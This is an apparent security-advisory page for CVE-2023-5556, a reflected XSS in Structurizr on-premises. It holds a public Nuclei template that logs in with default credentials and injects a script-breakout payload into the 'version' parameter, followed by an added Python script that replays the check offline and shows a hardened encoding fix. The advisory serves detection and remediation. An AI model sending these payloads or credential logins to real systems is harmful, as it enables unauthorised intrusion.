CVE-2023-5556: Structurizr on-premises - Cross Site Scripting

Date: 2025-08-01 | Affected software: Structurizr on-premises | PoC: public

Vulnerability description

Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194. The public PoC below targets the `version` query parameter of `/workspace/<id>/`: its value is reflected into a JavaScript string context, so a value ending in `");alert(document.domain);//` closes the string literal and the enclosing call, runs the injected script, and comments out the rest of the line. The CVSS vector's UI:R reflects that a victim must open the crafted link; the template itself signs in first only because it needs a valid workspace id to build that link.

PoC code [public]

Nuclei template. It signs in with the hard-coded pitchfork payloads (username `structurizr`, password `password`; replace them for your target), extracts the `_csrf` token from `/signin`, creates a workspace and reads its id from the redirect `Location` header, then requests the workspace page with the payload in `version` and matches the unescaped reflection in the response body.

id: CVE-2023-5556

info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankaracharya
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.
  reference:
    - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.2022
    epss-percentile: 0.95318
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: structurizr
    product: on-premises_installation
    shodan-query: http.favicon.hash:1199592666
    fofa-query: icon_hash=1199592666
  tags: cve,cve2023,xss,structurizr,oos,authenticated
variables:
  str: "{{randstr}}"

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&_csrf={{csrf}}&hash=

      - |
        GET /dashboard HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        GET /workspace/create HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - "structurizr"
      password:
        - "password"

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '<a href="/dashboard">'
          - 'Sign out'
        condition: and

      - type: word
        part: body_5
        words:
          - '");alert(document.domain);//'
          - 'Structurizr'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="([0-9a-z-]+)"'
        internal: true

      - type: regex
        name: workspace
        group: 1
        part: header
        regex:
          - '\/workspace\/([0-9]+)\?scriptNonce='
        internal: true
# digest: 4a0a0047304502204397c7954d08c929129f8a129a92a9d6c9de97e166a9846802d53f445e7ee26902210098db7bb610afe4d745a4d0cd37e04294102b007ccb07be59c52deb4d8a3dc5d8:922c64590222798bb761d5b6d8e72950
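The script below is an added example, not part of the original page and not Structurizr's code. It replays the template's logic offline: the same `_csrf` and workspace-id regexes, the `version` payload with the quote percent-encoded as `%22`, and the body_5 reflection check (tightened to require the random marker directly before the breakout). `render_vulnerable` and `render_hardened` are constructed stand-ins for the injection context the payload implies (a query value inside a JS string literal); the real server template is not on this page and is not reproduced here. The sample sign-in HTML, redirect URL and `loadWorkspace` call are constructed for the example.

```python
"""Added example (not from the page or the Structurizr project).

Offline replay of the Nuclei template's steps: CSRF and workspace-id
extraction, payload construction for the `version` parameter, and the
reflection check, plus a constructed vulnerable/hardened rendering of the
JS-string injection context. The render functions are stand-ins only.
"""
import json
import re
import secrets
from typing import Optional
from urllib.parse import urlencode

# Same patterns the template's extractors use.
CSRF_RE = re.compile(r'name="_csrf" value="([0-9a-z-]+)"')
WORKSPACE_RE = re.compile(r'/workspace/([0-9]+)\?scriptNonce=')

# Breakout suffix from the template: close the JS string and the call,
# run alert(), comment out whatever follows on that line.
BREAKOUT = '");alert(document.domain);//'


def extract_csrf(signin_html: str) -> Optional[str]:
    """Pull the _csrf hidden field out of GET /signin (template step 1)."""
    m = CSRF_RE.search(signin_html)
    return m.group(1) if m else None


def extract_workspace_id(location_header: str) -> Optional[str]:
    """Pull the numeric id out of the redirect after GET /workspace/create (step 4)."""
    m = WORKSPACE_RE.search(location_header)
    return m.group(1) if m else None


def build_request_path(workspace_id: str, marker: str) -> str:
    """Path for step 5; urlencode() percent-encodes the quote as %22 like the template."""
    return f"/workspace/{workspace_id}/?" + urlencode({"version": marker + BREAKOUT})


def is_reflected_unescaped(body: str, marker: str) -> bool:
    """The template's body_5 matcher, tightened: the random marker must sit
    immediately before the breakout, so a stray alert() elsewhere is not a hit."""
    return (marker + BREAKOUT) in body and "Structurizr" in body


def render_vulnerable(version: str) -> str:
    """Constructed stand-in: the value is dropped verbatim into a JS string literal."""
    return (
        "<html><head><title>Structurizr</title></head><body>"
        f'<script>loadWorkspace("{version}");</script></body></html>'
    )


def js_string_literal(value: str) -> str:
    """Encode an untrusted value as a JS string literal: json.dumps escapes the
    quote and backslash; '<' and '>' are escaped too so '</script>' cannot close the block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_hardened(version: str) -> str:
    """Same constructed page, value encoded before it reaches the script."""
    return (
        "<html><head><title>Structurizr</title></head><body>"
        f"<script>loadWorkspace({js_string_literal(version)});</script></body></html>"
    )


def demo() -> dict:
    """Run the offline walk-through on constructed responses and return the results."""
    marker = secrets.token_hex(4)  # stands in for {{randstr}}
    signin = '<input type="hidden" name="_csrf" value="1f2e3d4c-5b6a-4789-9abc-def012345678"/>'  # constructed
    location = "https://structurizr.example/workspace/7?scriptNonce=abc"  # constructed
    wid = extract_workspace_id(location)
    sent_value = marker + BREAKOUT  # what the server sees after URL-decoding
    return {
        "csrf": extract_csrf(signin),
        "path": build_request_path(wid, marker),
        "vulnerable_hit": is_reflected_unescaped(render_vulnerable(sent_value), marker),
        "hardened_hit": is_reflected_unescaped(render_hardened(sent_value), marker),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against a live instance you would send the five requests in the template's order with a cookie-carrying session and feed the real `/signin` body and `/workspace/create` redirect into `extract_csrf` and `extract_workspace_id`; the reflection check is the same call on the final response body.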